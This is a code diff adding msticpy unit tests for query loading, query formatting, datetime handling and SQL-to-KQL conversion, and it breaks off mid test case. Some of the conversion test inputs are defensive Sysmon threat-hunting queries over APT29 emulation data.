+    def driver_queries(self) -> Iterable[Dict[str, str]]:
+        """Return dynamic queries available on connection to service."""
+        return self.svc_queries
+
+
+_TEST_QUERIES = [
+    {
+        "name": "test_query1",
+        "query": "Select * from test",
+        "query_container": "SavedSearches",
+        "description": "Test 1",
+    },
+    {
+        "name": "test_query2",
+        "query": "Select * from test2",
+        "query_container": "SavedSearches",
+        "description": "Test 2",
+    },
+    {
+        "name": "test.query3",
+        "query": "Select * from test3",
+        "query_container": "SavedSearches",
+        "description": "Test 3",
+    },
+]
+
+
+class TestDataQuery(unittest.TestCase):
+    """Unit test class."""
+
+    provider = None
+
+    def setUp(self):
+        """Test initialization."""
+        provider = UTDataDriver()
+        self.assertTrue(provider.loaded)
+        provider.connect("testuri")
+        self.assertTrue(provider.connected)
+        self.provider = provider
+        with warnings.catch_warnings():
+            warnings.simplefilter("ignore", category=UserWarning)
+            self.la_provider = QueryProvider(
+                data_environment="LogAnalytics", driver=self.provider
+            )
+
+    def test_load_kql_query_defs(self):
+        """Test loading query definitions."""
+        la_provider = self.la_provider
+        la_provider.connect(connection_str="test")
+        self.assertEqual(getattr(la_provider, "test"), "CustomAttrib")
+
+        # Did we read and process the query definitions OK
+        q_sources = la_provider.query_store.data_families
+        self.assertGreaterEqual(len(q_sources["WindowsSecurity"]), 9)
+        self.assertGreaterEqual(len(q_sources["SecurityAlert"]), 5)
+        self.assertGreaterEqual(len(q_sources["LinuxSyslog"]), 5)
+
+        # pick one item and check properties
+        get_alert_q = q_sources["SecurityAlert"]["get_alert"]
+        self.assertEqual(len(get_alert_q.default_params), 3)
+        self.assertEqual(len(get_alert_q.params), 4)
+        self.assertEqual(len(get_alert_q.required_params), 1)
+        self.assertEqual(len(get_alert_q.metadata), 6)
+        self.assertIn("data_families", get_alert_q.metadata)
+        self.assertIn("data_environments", get_alert_q.metadata)
+        self.assertEqual(len(get_alert_q.data_families), 1)
+        self.assertEqual(get_alert_q.name, "get_alert")
+        self.assertIn("Retrieves", get_alert_q.description)
+
+    def test_query_create_funcs(self):
+        """Test create partial functions."""
+        la_provider = self.la_provider
+        # graph_provider = QueryProvider(data_environment = 'SecurityGraph',
+        #                           la_provider     driver='dummy')
+
+        all_queries = [
+            q for q in dir(la_provider.all_queries) if not q.startswith("__")
+        ]
+        winsec_queries = [
+            q for q in dir(la_provider.WindowsSecurity) if not q.startswith("__")
+        ]
+        alert_queries = [
+            q for q in dir(la_provider.SecurityAlert) if not q.startswith("__")
+        ]
+        self.assertGreaterEqual(len(all_queries), 14)
+        self.assertGreaterEqual(len(winsec_queries), 9)
+        self.assertGreaterEqual(len(alert_queries), 5)
+
+        # Test that function attributes have been created properly
+        for _, func in la_provider.all_queries:
+            self.assertIsInstance(func, partial)
+            self.assertTrue(len(func.__doc__))
+            self.assertIn("Parameters", func.__doc__)
+
+    def test_load_query_exec(self):
+        """Test run query."""
+        la_provider = self.la_provider
+        df = la_provider.all_queries.get_alert("help")
+        self.assertIsNone(df)
+
+        with self.assertRaises(ValueError) as cm:
+            df = la_provider.all_queries.get_alert()
+            self.assertIn("system_alert_id", str(cm.exception))
+
+        df = la_provider.all_queries.get_alert(system_alert_id="foo")
+        self.assertEqual(len(df), 1)
+        self.assertIn('SystemAlertId == "foo"', df["query"].iloc[0])
+
+    def test_load_graph_query_defs(self):
+        """Test Security graph query load."""
+        provider = QueryProvider(data_environment="SecurityGraph", driver=self.provider)
+
+        # Did we read and process the query definitions OK
+        q_sources = provider.query_store.data_families
+        self.assertGreaterEqual(len(q_sources["SecurityGraphAlert"]), 7)
+
+        # pick one item and check properties
+        get_alert_q = q_sources["SecurityGraphAlert"]["get_alert"]
+        self.assertEqual(len(get_alert_q.default_params), 6)
+        self.assertEqual(len(get_alert_q.params), 7)
+        self.assertEqual(len(get_alert_q.required_params), 1)
+        self.assertEqual(len(get_alert_q.metadata), 6)
+        self.assertIn("data_families", get_alert_q.metadata)
+        self.assertIn("data_environments", get_alert_q.metadata)
+        self.assertEqual(len(get_alert_q.data_families), 1)
+        self.assertEqual(get_alert_q.name, "get_alert")
+        self.assertIn("Retrieves", get_alert_q.description)
+
+    def test_graph_query_create_funcs(self):
+        """Test Security Graph create partial functions."""
+        provider = QueryProvider(data_environment="SecurityGraph", driver=self.provider)
+
+        all_queries = [q for q in dir(provider.all_queries) if not q.startswith("__")]
+        alert_queries = [
+            q for q in dir(provider.SecurityGraphAlert) if not q.startswith("__")
+        ]
+        self.assertGreaterEqual(len(all_queries), 7)
+        self.assertGreaterEqual(len(alert_queries), 7)
+
+        # Test that function attributes have been created properly
+        for _, func in provider.all_queries:
+            self.assertIsInstance(func, partial)
+            self.assertTrue(len(func.__doc__))
+            self.assertIn("Parameters", func.__doc__)
+
+    def test_graph_load_query_exec(self):
+        """Test Security graph run query."""
+        provider = QueryProvider(data_environment="SecurityGraph", driver=self.provider)
+        df = provider.all_queries.get_alert("help")
+        self.assertIsNone(df)
+
+        with self.assertRaises(ValueError) as cm:
+            df = provider.all_queries.get_alert()
+            self.assertIn("alert_id", str(cm.exception))
+
+        df = provider.all_queries.get_alert(alert_id="foo")
+        self.assertEqual(len(df), 1)
+        self.assertIn("/foo", df["query"].iloc[0])
+
+    def test_load_yaml_def(self):
+        """Test query loader rejecting badly formed query files."""
+        la_provider = self.la_provider
+        with self.assertRaises((MsticpyException, ValueError)) as cm:
+            file_path = Path(_TEST_DATA, "data_q_meta_fail.yaml")
+            la_provider.import_query_file(query_file=file_path)
+            self.assertIn("no data families defined", str(cm.exception))
+
+        with self.assertRaises((MsticpyException, ValueError)) as cm:
+            file_path = Path(_TEST_DATA, "data_q_source_fail_param.yaml")
+            la_provider.import_query_file(query_file=file_path)
+            self.assertIn("Missing parameters are", str(cm.exception))
+
+        with self.assertRaises((MsticpyException, ValueError)) as cm:
+            file_path = Path(_TEST_DATA, "data_q_source_fail_type.yaml")
+            la_provider.import_query_file(query_file=file_path)
+            self.assertIn("Parameters with missing types", str(cm.exception))
+
+        before_queries = len(list(la_provider.list_queries()))
+        file_path = Path(_TEST_DATA, "data_q_success.yaml")
+        la_provider.import_query_file(query_file=file_path)
+
+        self.assertEqual(before_queries + 3, len(list(la_provider.list_queries())))
+
+    def test_load_hierarchical_q_paths(self):
+        """Test use of hierarchical query paths."""
+        la_provider = self.la_provider
+        file_path = Path(_TEST_DATA, "data_q_hierarchy.yaml")
+        la_provider.import_query_file(query_file=file_path)
+
+        self.assertIsNotNone(la_provider.Alerts)
+        self.assertEqual(len(la_provider.Alerts), 3)
+
+        for _, item in la_provider.Alerts:
+            self.assertTrue(isinstance(item, (partial, QueryContainer)))
+            if isinstance(item, QueryContainer):
+                self.assertTrue(repr(item).startswith("query"))
+                self.assertIn("(query)", repr(item))
+
+        self.assertIsInstance(la_provider.Alerts.type1.query1, partial)
+        self.assertIsInstance(la_provider.Alerts.type2.query2, partial)
+        self.assertIsInstance(la_provider.Alerts.type3.query3, partial)
+
+    def test_query_store_get(self):
+        """Test QueryStore get function."""
+        la_provider = self.la_provider
+        file_path = Path(_TEST_DATA, "data_q_hierarchy.yaml")
+        la_provider.import_query_file(query_file=file_path)
+        q_store = la_provider.query_store
+
+        q_src = q_store.get_query("Alerts.type1.query1")
+        self.assertIsInstance(q_src, QuerySource)
+        self.assertEqual(q_src.name, "query1")
+        q_src2 = q_store.get_query("Alerts.type1.query1", query_path="Alerts")
+        self.assertIsInstance(q_src2, QuerySource)
+        self.assertIs(q_src, q_src2)
+        q_src3 = q_store.get_query("type1.query1", query_path="Alerts")
+        self.assertIsInstance(q_src3, QuerySource)
+        self.assertIs(q_src, q_src3)
+
+        with self.assertRaises(LookupError):
+            q_src = q_store.get_query("Alerts.type1.query2")
+
+    def test_query_store_find(self):
+        """Test QueryStore find query function."""
+        la_provider = self.la_provider
+        file_path = Path(_TEST_DATA, "data_q_hierarchy.yaml")
+        la_provider.import_query_file(query_file=file_path)
+        q_store = la_provider.query_store
+
+        result = list(q_store.find_query("query1"))
+        self.assertGreaterEqual(len(result), 1)
+
+        result = list(q_store.find_query("missing_query1"))
+        self.assertEqual(len(result), 0)
+
+    def test_connect_queries(self):
+        """Test queries provided at connect time."""
+        ut_provider = UTDataDriver()
+        ut_provider.svc_queries = _TEST_QUERIES
+
+        data_provider = QueryProvider(
+            data_environment="LogAnalytics", driver=ut_provider
+        )
+        data_provider.connect("testuri")
+
+        # Check that we have expected attributes
+        self.assertTrue(hasattr(data_provider, "SavedSearches"))
+        saved_searches = getattr(data_provider, "SavedSearches")
+        for attr in _TEST_QUERIES:
+            attr = attr["name"].split(".")[0]
+            self.assertTrue(hasattr(saved_searches, attr))
+            self.assertTrue(
+                isinstance(getattr(saved_searches, attr), (partial, QueryContainer))
+            )
+
+        # Check that we have expected query text
+        q_store = data_provider.query_store
+        q_src = q_store.get_query("SavedSearches.test.query3")
+        self.assertEqual(q_src.query, _TEST_QUERIES[2]["query"])
+
+    def test_connect_queries_dotted(self):
+        """Test queries provided at connect time."""
+        # Same test as above but with dotted container
+        ut_provider = UTDataDriver()
+        dotted_container_qs = _TEST_QUERIES.copy()
+        for query in dotted_container_qs:
+            query["query_container"] = "Saved.Searches"
+        ut_provider.svc_queries = dotted_container_qs
+        data_provider = QueryProvider(
+            data_environment="LogAnalytics", driver=ut_provider
+        )
+        data_provider.connect("testuri")
+
+        self.assertTrue(hasattr(data_provider, "Saved"))
+        saved_searches = getattr(data_provider, "Saved")
+        saved_searches = getattr(saved_searches, "Searches")
+        for attr in dotted_container_qs:
+            attr = attr["name"].split(".")[0]
+            self.assertTrue(hasattr(saved_searches, attr))
+            self.assertTrue(
+                isinstance(getattr(saved_searches, attr), (partial, QueryContainer))
+            )
+
+        q_store = data_provider.query_store
+        q_src = q_store.get_query("Saved.Searches.test.query3")
+        self.assertEqual(q_src.query, dotted_container_qs[2]["query"])
+
+    def test_split_ranges(self):
+        """Test time range split logic."""
+        start = datetime.utcnow() - pd.Timedelta("5H")
+        end = datetime.utcnow() + pd.Timedelta("5min")
+        delta = pd.Timedelta("1H")
+
+        ranges = QueryProvider._calc_split_ranges(start, end, delta)
+        self.assertEqual(len(ranges), 5)
+        self.assertEqual(ranges[0][0], start)
+        self.assertEqual(ranges[-1][1], end)
+
+        st_times = [start_tm[0] for start_tm in ranges]
+        for end_time in (end_tm[1] for end_tm in ranges):
+            self.assertNotIn(end_time, st_times)
+
+        end = end + pd.Timedelta("20min")
+        ranges = QueryProvider._calc_split_ranges(start, end, delta)
+        self.assertEqual(len(ranges), 5)
+        self.assertEqual(ranges[0][0], start)
+        self.assertEqual(ranges[-1][1], end)
+
+    def test_split_queries(self):
+        """Test queries split into time segments."""
+        la_provider = self.la_provider
+
+        start = datetime.utcnow() - pd.Timedelta("5H")
+        end = datetime.utcnow() + pd.Timedelta("5min")
+        delta = pd.Timedelta("1H")
+
+        ranges = QueryProvider._calc_split_ranges(start, end, delta)
+        result_queries = la_provider.all_queries.list_alerts(
+            "print", start=start, end=end, split_query_by="1H"
+        )
+        queries = result_queries.split("\n\n")
+        self.assertEqual(len(queries), 5)
+
+        for idx, (st_time, e_time) in enumerate(ranges):
+            self.assertIn(st_time.isoformat(sep="T") + "Z", queries[idx])
+            self.assertIn(e_time.isoformat(sep="T") + "Z", queries[idx])
+        self.assertIn(start.isoformat(sep="T") + "Z", queries[0])
+        self.assertIn(end.isoformat(sep="T") + "Z", queries[-1])
+
+    def test_split_queries_err(self):
+        """Test queries split error conditions."""
+        la_provider = self.la_provider
+
+        mssg = io.StringIO()
+        with contextlib.redirect_stdout(mssg):
+            result_queries = la_provider.all_queries.get_alert(
+                "print", system_alert_id="test", split_query_by="1H"
+            )
+        queries = result_queries.split("\n\n")
+        # if no start and end - provider prints message and returns None
+        self.assertEqual(len(queries), 1)
+        self.assertIn("Cannot split a query that", mssg.getvalue())
+
+        # With invalid split_query_by value it will default to 1D
+        start = datetime.utcnow() - pd.Timedelta("5D")
+        end = datetime.utcnow() + pd.Timedelta("5min")
+
+        result_queries = la_provider.all_queries.list_alerts(
+            "print", start=start, end=end, split_query_by="Invalid"
+        )
+        queries = result_queries.split("\n\n")
+        self.assertEqual(len(queries), 5)
+
+
+_LOCAL_DATA_PATHS = [str(get_test_data_path().joinpath("localdata"))]
+
+
+def test_add_provider():
+    """Test adding connection instance to provider."""
+    prov_args = dict(query_paths=_LOCAL_DATA_PATHS, data_paths=_LOCAL_DATA_PATHS)
+    # create local provider and run a query
+    local_prov = QueryProvider("LocalData", **prov_args)
+    single_results = local_prov.Azure.list_all_signins_geo()
+
+    # add another connection (to same folder)
+    local_prov.add_connection(alias="SecondInst", **prov_args)
+    connections = local_prov.list_connections()
+    # verify second connection is listed
+    check.equal(len(connections), 2)
+    check.is_in("Default:", connections[0])
+    check.is_in("SecondInst:", connections[1])
+
+    # run query again
+    multi_results = local_prov.Azure.list_all_signins_geo()
+    # verify len of result is 2x single_result
+    check.equal(single_results.shape[0] * 2, multi_results.shape[0])
+    # verify columns/schema is the same.
+    check.equal(list(single_results.columns), list(multi_results.columns))
+
+
+def test_query_prov_properties():
+    """Test basic properties of QueryProvider instance."""
+    prov_args = dict(query_paths=_LOCAL_DATA_PATHS, data_paths=_LOCAL_DATA_PATHS)
+    # create local provider
+    local_prov = QueryProvider("LocalData", **prov_args)
+    local_prov.connect()
+
+    check.is_not_none(local_prov.connection_string)
+    check.is_not_none(local_prov.schema_tables)
+
+    qry_help = io.StringIO()
+    with contextlib.redirect_stdout(qry_help):
+        local_prov.query_help("LinuxSyslog.linux_events")
+    check.is_in("List Linux Events", qry_help.getvalue())
+    check.is_not_none(local_prov.browse_queries())
+    check.is_not_none(local_prov.query_time)
+
+    data_envs = QueryProvider.list_data_environments()
+    check.greater(len(data_envs), 5)
+    check.is_in("M365D", data_envs)
+    check.is_in("LocalData", data_envs)
+    check.is_in("ResourceGraph", data_envs)
diff --git a/tests/data/test_query_defns.py b/tests/data/test_query_defns.py
new file mode 100644
index 000000000..b2f66b57a
--- /dev/null
+++ b/tests/data/test_query_defns.py
@@ -0,0 +1,56 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Test Query definitions."""
+
+import pandas as pd
+import pytest_check as check
+
+
+from msticpy.data.query_defns import ensure_df_datetimes
+
+from ..unit_test_lib import get_test_data_path
+
+__author__ = "Ian Hellen"
+
+# pylint: disable=redefined-outer-name
+
+
+def test_ensure_df_datetimes():
+    """Test timezone auto-conversion."""
+    source_df = pd.read_pickle(
+        str(get_test_data_path().joinpath("localdata/alerts_list.pkl"))
+    )
+    source_df["TimeString"] = source_df.TimeGenerated.astype("str")
+    source_df["DTString"] = source_df.TimeGenerated.astype("str")
+
+    check.equal(source_df.select_dtypes("datetime").shape[1], 4)
+    check.equal(source_df.select_dtypes("datetimetz").shape[1], 0)
+
+    # This should convert all 5 cols to TZ-aware
+    result_df = ensure_df_datetimes(source_df)
+    check.equal(result_df.select_dtypes("datetime").shape[1], 0)
+    check.equal(result_df.select_dtypes("datetimetz").shape[1], 5)
+
+    # Only process 1 column
+    result_df = ensure_df_datetimes(source_df, columns="TimeString")
+    check.equal(result_df.select_dtypes("datetime").shape[1], 4)
+    check.equal(result_df.select_dtypes("datetimetz").shape[1], 1)
+
+    # Process list of columns
+    result_df = ensure_df_datetimes(
+        source_df, columns=["TimeGenerated", "StartTimeUtc", "TimeString", "DTString"]
+    )
+    check.equal(result_df.select_dtypes("datetime").shape[1], 2)
+    check.equal(result_df.select_dtypes("datetimetz").shape[1], 4)
+
+    # Process list of columns but do not change TZ-naive columns
+    result_df = ensure_df_datetimes(
+        source_df,
+        columns=["TimeGenerated", "StartTimeUtc", "TimeString", "DTString"],
+        add_utc_tz=False,
+    )
+    check.equal(result_df.select_dtypes("datetime").shape[1], 4)
+    check.equal(result_df.select_dtypes("datetimetz").shape[1], 2)
diff --git a/tests/data/test_query_source.py b/tests/data/test_query_source.py
new file mode 100644
index 000000000..f1d90aa39
--- /dev/null
+++ b/tests/data/test_query_source.py
@@ -0,0 +1,283 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""datq query test class."""
+import os
+import unittest
+import warnings
+from datetime import datetime, timedelta
+from typing import Any, Tuple, Union, Optional
+
+import pandas as pd
+import pytest
+import pytest_check as check
+
+from msticpy.data.data_providers import DriverBase, QueryProvider
+from msticpy.data.query_source import QuerySource
+from msticpy.data.drivers import kql_driver
+
+_SPLUNK_IMP_OK = False
+try:
+    from msticpy.data.drivers import splunk_driver
+
+    _SPLUNK_IMP_OK = True
+except ImportError:
+    pass
+
+# pylint: disable=protected-access, invalid-name
+
+
+class UTDataDriver(DriverBase):
+    """Test class."""
+
+    def __init__(self, **kwargs):
+        """Initialize new instance."""
+        super().__init__(**kwargs)
+        self._kwargs = kwargs
+        self._loaded = True
+        self._connected = False
+
+    def connect(self, connection_str: Optional[str] = None, **kwargs):
+        """Test method."""
+        del connection_str
+        self._connected = True
+
+    def query(
+        self, query: str, query_source: QuerySource = None, **kwargs
+    ) -> Union[pd.DataFrame, Any]:
+        """Test method."""
+        del query_source, kwargs
+        return pd.DataFrame(data=query, index=[0], columns=["query"])
+
+    def query_with_results(self, query: str, **kwargs) -> Tuple[pd.DataFrame, Any]:
+        """Test method."""
+        return (pd.DataFrame(data=query, index=[0], columns=["query"]), query)
+
+
+_test_data_folders = [
+    d for d, _, _ in os.walk(os.getcwd()) if d.endswith("/tests/testdata")
+]
+if len(_test_data_folders) == 1:
+    _TEST_DATA = _test_data_folders[0]
+else:
+    _TEST_DATA = "./tests/testdata"
+
+
+class TestQuerySource(unittest.TestCase):
+    """Unit test class."""
+
+    provider = None
+
+    def setUp(self):
+        """Intialize test."""
+        provider = UTDataDriver()
+        self.assertTrue(provider.loaded)
+        provider.connect("testuri")
+        self.assertTrue(provider.connected)
+        self.provider = provider
+        with warnings.catch_warnings():
+            warnings.simplefilter("ignore", category=UserWarning)
+            self.la_provider = QueryProvider(
+                data_environment="LogAnalytics", driver=self.provider
+            )
+        self.query_sources = self.la_provider.query_store.data_families
+
+    def test_date_formatters_datetime(self):
+        """Test date formatting standard date."""
+        # standard date
+        test_end = datetime.utcnow()
+        test_start = test_end - timedelta(days=1)
+        check_dt_str = test_start.isoformat(sep="T") + "Z"
+        q_src = self.query_sources["SecurityAlert"]["list_related_alerts"]
+        query = q_src.create_query(start=test_start, end=test_end)
+        self.assertIn(check_dt_str, query)
+
+    def test_date_formatters_datestring(self):
+        """Test date formatting ISO date string."""
+        test_end = datetime.utcnow()
+        test_start = test_end - timedelta(days=1)
+        check_dt_str = test_start.isoformat(sep="T") + "Z"
+        start = test_start.isoformat()
+        q_src = self.query_sources["SecurityAlert"]["list_related_alerts"]
+        query = q_src.create_query(start=start, end=test_end)
+        self.assertIn(check_dt_str, query)
+
+        start = str(test_start)
+        query = q_src.create_query(start=start, end=test_end)
+        self.assertIn(check_dt_str, query)
+
+    def test_date_formatters_off_1day(self):
+        """Test date formatting Offset -1 day."""
+        test_end = datetime.utcnow()
+        q_src = self.query_sources["SecurityAlert"]["list_related_alerts"]
+        query = q_src.create_query(start=-1, end=0)
+        check_date = test_end - timedelta(1)
+        check_date_str = check_date.isoformat(sep="T") + "Z"
+        # check that date + hours are correct
+        check_date_str = check_date_str.split(":", 1)[0]
+        self.assertIn(check_date_str, query)
+
+    def test_date_formatters_off_1day_str(self):
+        """Test date formatting Offset -1 day as string."""
+        test_dt = datetime.utcnow()
+        q_src = self.query_sources["SecurityAlert"]["list_related_alerts"]
+        query = q_src.create_query(start="-1d", end=test_dt)
+        check_date = test_dt - timedelta(1)
+        check_date_str = check_date.isoformat(sep="T") + "Z"
+        check_date_str = check_date_str.split(":", 1)[0]
+        self.assertIn(check_date_str, query)
+
+    def test_date_formatters_off_1week_str(self):
+        """Test date formatting Offset -1 week."""
+        test_dt = datetime.utcnow()
+        q_src = self.query_sources["SecurityAlert"]["list_related_alerts"]
+        query = q_src.create_query(start="-1w", end=test_dt)
+        check_date = test_dt - timedelta(7)
+        check_date_str = check_date.isoformat(sep="T") + "Z"
+        check_date_str = check_date_str.split(":", 1)[0]
+        self.assertIn(check_date_str, query)
+
+    def test_date_formatters_off_1wk_rnd_dn(self):
+        """Test date formatting Offset -1 week rounded to day."""
+        test_dt = datetime.utcnow()
+        q_src = self.query_sources["SecurityAlert"]["list_related_alerts"]
+        query = q_src.create_query(start="-1w@d", end=test_dt)
+        check_date = test_dt - timedelta(7)
+        check_date_str = check_date.isoformat(sep="T") + "Z"
+        check_date_str = check_date_str.split("T", 1)[0] + "T00:00:00"
+        self.assertIn(check_date_str, query)
+
+    def test_date_formatters_off_1wk_rnd_up(self):
+        """Test date formatting Offset +1 week rounded to day."""
+        test_dt = datetime.utcnow()
+        q_src = self.query_sources["SecurityAlert"]["list_related_alerts"]
+        query = q_src.create_query(start="1w@d", end=test_dt)
+        check_date = test_dt + timedelta(7 + 1)
+        check_date_str = check_date.isoformat(sep="T") + "Z"
+        check_date_str = check_date_str.split("T", 1)[0] + "T00:00:00"
+        self.assertIn(check_date_str, query)
+
+    def test_list_formatter(self):
+        """Test for default list formatting."""
+        test_end = datetime.utcnow()
+        test_start = test_end - timedelta(days=1)
+        q_src = self.query_sources["Azure"]["list_azure_activity_for_ip"]
+        ip_address_list = ["192.168.0.1", "192.168.0.2", "192.168.0.3"]
+        query = q_src.create_query(
+            ip_address_list=ip_address_list, start=test_start, end=test_end
+        )
+
+        check_list = ",".join([f"'{ip}'" for ip in ip_address_list])
+        self.assertIn(check_list, query)
+
+        ip_address_list = "192.168.0.1, 192.168.0.2, 192.168.0.3"
+        query = q_src.create_query(
+            ip_address_list=ip_address_list, start=test_start, end=test_end
+        )
+        self.assertIn(check_list, query)
+
+        int_list = [1, 2, 3, 4]
+        query = q_src.create_query(
+            ip_address_list=int_list, start=test_start, end=test_end
+        )
+        check_list = ",".join([str(i) for i in int_list])
+        self.assertIn(check_list, query)
+
+    def test_cust_formatters_kql(self):
+        """Test KqlDriver formatting."""
+        kql_fmt = {
+            "datetime": kql_driver.KqlDriver._format_datetime,
+            "list": kql_driver.KqlDriver._format_list,
+        }
+
+        test_end = datetime.utcnow()
+        test_start = test_end - timedelta(days=1)
+        ip_address_list = "192.168.0.1, 192.168.0.2, 192.168.0.3"
+
+        check_dt_str = test_start.isoformat(sep="T") + "Z"
+        q_src = self.query_sources["Azure"]["list_azure_activity_for_ip"]
+        query = q_src.create_query(
+            formatters=kql_fmt,
+            start=test_start,
+            end=test_end,
+            ip_address_list=ip_address_list,
+        )
+        self.assertIn(check_dt_str, query)
+
+        query = q_src.create_query(
+            formatters=kql_fmt,
+            ip_address_list=ip_address_list,
+            start=test_start,
+            end=test_end,
+        )
+        check_list = ",".join([f"'{ip.strip()}'" for ip in ip_address_list.split(",")])
+        self.assertIn(check_list, query)
+
+        int_list = [1, 2, 3, 4]
+        query = q_src.create_query(
+            formatters=kql_fmt,
+            ip_address_list=int_list,
+            start=test_start,
+            end=test_end,
+        )
+        check_list = ",".join([str(i) for i in int_list])
+        self.assertIn(check_list, query)
+
+
+@pytest.mark.skipif(not _SPLUNK_IMP_OK, reason="Partial msticpy install")
+def test_cust_formatters_splunk():
+    """Test SplunkDriver formatting."""
+    provider = UTDataDriver()
+    provider.connect("testuri")
+    la_provider = QueryProvider(data_environment="LogAnalytics", driver=provider)
+    query_sources = la_provider.query_store.data_families
+
+    splunk_provider = QueryProvider(data_environment="Splunk", driver=provider)
+    splunk_query_sources = splunk_provider.query_store.data_families
+
+    splunk_fmt = {
+        "datetime": splunk_driver.SplunkDriver._format_datetime,
+        "list": splunk_driver.SplunkDriver._format_list,
+    }
+
+    test_end = datetime.utcnow()
+    test_start = test_end - timedelta(days=1)
+    ip_address_list = "192.168.0.1, 192.168.0.2, 192.168.0.3"
+
+    check_dt_str = test_start.isoformat(sep=" ")
+    # Using an Azure Sentinel query here since we want something
+    # that requires a list parameter
+    q_src = query_sources["Azure"]["list_azure_activity_for_ip"]
+    query = q_src.create_query(
+        formatters=splunk_fmt,
+        start=test_start,
+        end=test_end,
+        ip_address_list=ip_address_list,
+    )
+    check.is_in(check_dt_str, query)
+
+    query = q_src.create_query(
+        formatters=splunk_fmt,
+        start=test_start,
+        end=test_end,
+        ip_address_list=ip_address_list,
+    )
+    # Double-quote list elements
+    check_list = ",".join([f'"{ip.strip()}"' for ip in ip_address_list.split(",")])
+    check.is_in(check_list, query)
+
+    int_list = [1, 2, 3, 4]
+    query = q_src.create_query(
+        formatters=splunk_fmt, start=test_start, end=test_end, ip_address_list=int_list
+    )
+    # Always quoted strings
+    check_list = ",".join([f'"{i}"' for i in int_list])
+    check.is_in(check_list, query)
+
+    # Use a splunk query to verify timeformat parameter and datetime formatting
+    q_src = splunk_query_sources["SplunkGeneral"]["get_events_parameterized"]
+    query = q_src.create_query(formatters=splunk_fmt, start=test_start, end=test_end)
+    check.is_in('timeformat="%Y-%m-%d %H:%M:%S.%6N"', query)
+    check.is_in(f'earliest="{check_dt_str}"', query)
diff --git a/tests/data/test_sql_to_kql.py b/tests/data/test_sql_to_kql.py
new file mode 100644
index 000000000..54eedf573
--- /dev/null
+++ b/tests/data/test_sql_to_kql.py
@@ -0,0 +1,191 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Test module for sql_to_kql."""
+from collections import namedtuple
+
+import pytest
+import pytest_check as check
+
+from msticpy.data import sql_to_kql
+
+
+SQLTestCase = namedtuple("SQLTestCase", "sql, kql, id, rename")
+SQL_CASES = [
+    SQLTestCase(
+        sql="""
+        SELECT DISTINCT Message, Otherfield
+        FROM apt29Host
+        WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
+            AND EventID BETWEEN 1 AND 10
+            AND LOWER(ParentImage) LIKE '%explorer.exe'
+            AND EventID IN ('4', '5', '6')
+            AND LOWER(Image) LIKE "3aka3%"
+        LIMIT 10
+        """,
+        kql="""
+        SecurityEvent
+        | where Channel == 'Microsoft-Windows-Sysmon/Operational'
+        and EventID between (1 .. 10)
+        and tolower(ParentImage) endswith 'explorer.exe'
+        and EventID in ('4', '5', '6')
+        and tolower(Image) startswith '3aka3'
+        | project Message, Otherfield
+        | distinct Message, Otherfield
+        | limit 10
+        """,
+        id="select",
+        rename={"apt29Host": "SecurityEvent"},
+    ),
+    SQLTestCase(
+        sql="""
+        SELECT DISTINCT Message, Otherfield, COUNT(DISTINCT EventID)
+        FROM (SELECT EventID, ParentImage, Image, Message, Otherfield FROM apt29Host) as A
+        --FROM A
+        INNER JOIN (Select Message, foo FROM MyTable ) on MyTable.Message == A.Message and MyTable.foo == A.EventID
+        WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
+            AND EventID = 1
+            AND LOWER(ParentImage) LIKE "%explorer.exe"
+            AND LOWER(Image) RLIKE ".*3aka3%"
+        GROUP BY EventID
+        ORDER BY Message DESC, Otherfield
+        LIMIT 10
+        """,
+        kql="""
+        apt29Host
+        | project EventID, ParentImage, Image, Message, Otherfield
+        | join kind=inner (MyTable
+        | project Message, foo) on $right.Message == $left.Message
+        and $right.foo == $left.EventID
+        | where Channel == 'Microsoft-Windows-Sysmon/Operational'
+        and EventID == 1
+        and tolower(ParentImage) endswith 'explorer.exe'
+        and tolower(Image) startswith '.*3aka3'
+        | summarize any(Message), any(Otherfield), dcount(EventID) by EventID
+        | order by Message desc, Otherfield
+        | limit 10
+        """,
+        id="join",
+        rename=None,
+    ),
+    SQLTestCase(
+        sql="""
+        SELECT Message
+        FROM apt29Host a
+        INNER JOIN (
+            SELECT ProcessGuid
+            FROM apt29Host
+            WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
+                AND EventID = 1
+                AND LOWER(ParentImage) RLIKE '.*\\‎|â€|‪|‫|‬|â€|‮.*'
+                AND LOWER(Image) LIKE '%cmd.exe'
+        ) b
+        ON a.ParentProcessGuid = b.ProcessGuid
+        WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
+            AND EventID = 1
+            AND LOWER(Image) LIKE '%powershell.exe'
+        """,
+        kql="""
+        apt29Host
+        | join kind=inner (apt29Host
+        | where Channel == 'Microsoft-Windows-Sysmon/Operational'
+        and EventID == 1
+        and tolower(ParentImage) matches regex '.*\‎|â€|‪|‫|‬|â€|‮.*'
+        and tolower(Image) endswith 'cmd.exe'
+        | project ProcessGuid) on $left.ParentProcessGuid == $right.ProcessGuid
+        | where Channel == 'Microsoft-Windows-Sysmon/Operational'
+        and EventID == 1
+        and tolower(Image) endswith 'powershell.exe'
+        | project Message
+        """,
+        id="join2",
+        rename=None,
+    ),
+    SQLTestCase(
+        sql="""
+        SELECT DISTINCT Message, COUNT(Otherfield)
+        FROM (SELECT *
+            FROM (SELECT EventID, ParentImage, Image, Message, Otherfield FROM apt29Host)
+
+            UNION
+            SELECT DISTINCT Message, Otherfield, EventID
+            FROM (SELECT EventID, ParentImage, Image, Message, Otherfield FROM apt29Host) as A
+            INNER JOIN MyTable on MyTable.mssg = A.Message
+            WHERE Channel = "Microsoft-Windows-Sysmon/Operational"
+                AND EventID = 1
+                AND LOWER(ParentImage) LIKE "%explorer.exe"
+                AND LOWER(Image) RLIKE ".*3aka3%"
+            LIMIT 10
+            )
+        GROUP BY Message
+        ORDER BY Message DESC, Otherfield
+        """,
+        kql="""
+        apt29Host
+        | project EventID, ParentImage, Image, Message, Otherfield
+        | union (apt29Host
